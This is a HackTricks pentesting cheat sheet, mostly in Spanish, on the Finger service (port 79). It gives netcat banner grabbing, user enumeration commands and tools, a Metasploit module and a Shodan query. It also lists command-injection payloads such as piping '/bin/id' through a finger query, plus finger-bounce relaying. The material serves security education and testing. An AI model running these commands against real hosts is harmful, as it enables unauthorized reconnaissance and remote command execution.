79 - Pentesting Finger

tip

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Información Básica

El programa/servicio Finger se utiliza para recuperar detalles sobre los usuarios de computadoras. Típicamente, la información proporcionada incluye el nombre de inicio de sesión del usuario, nombre completo, y, en algunos casos, detalles adicionales. Estos detalles adicionales podrían abarcar la ubicación de la oficina y el número de teléfono (si está disponible), la hora en que el usuario inició sesión, el período de inactividad (tiempo inactivo), la última vez que el correo fue leído por el usuario, y el contenido de los archivos de plan y proyecto del usuario.

Puerto por defecto: 79

PORT   STATE SERVICE
79/tcp open  finger

Enumeración

Captura de Banner/Conexión básica

bash

nc -vn <IP> 79
echo "root" | nc -vn <IP> 79

Enumeración de usuarios

bash

finger @<Victim>       #List users
finger admin@<Victim>  #Get info of user
finger user@<Victim>   #Get info of user

Alternativamente, puedes usar finger-user-enum de pentestmonkey, algunos ejemplos:

bash

finger-user-enum.pl -U users.txt -t 10.0.0.1
finger-user-enum.pl -u root -t 10.0.0.1
finger-user-enum.pl -U users.txt -T ips.txt

Nmap ejecuta un script para hacer usando scripts predeterminados

Metasploit utiliza más trucos que Nmap

use auxiliary/scanner/finger/finger_users

Shodan

port:79 USER

Ejecución de comandos

bash

finger "|/bin/id@example.com"
finger "|/bin/ls -a /@example.com"

Finger Bounce

Usar un sistema como un relay de finger

finger user@host@victim
finger @internal@external

tip

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.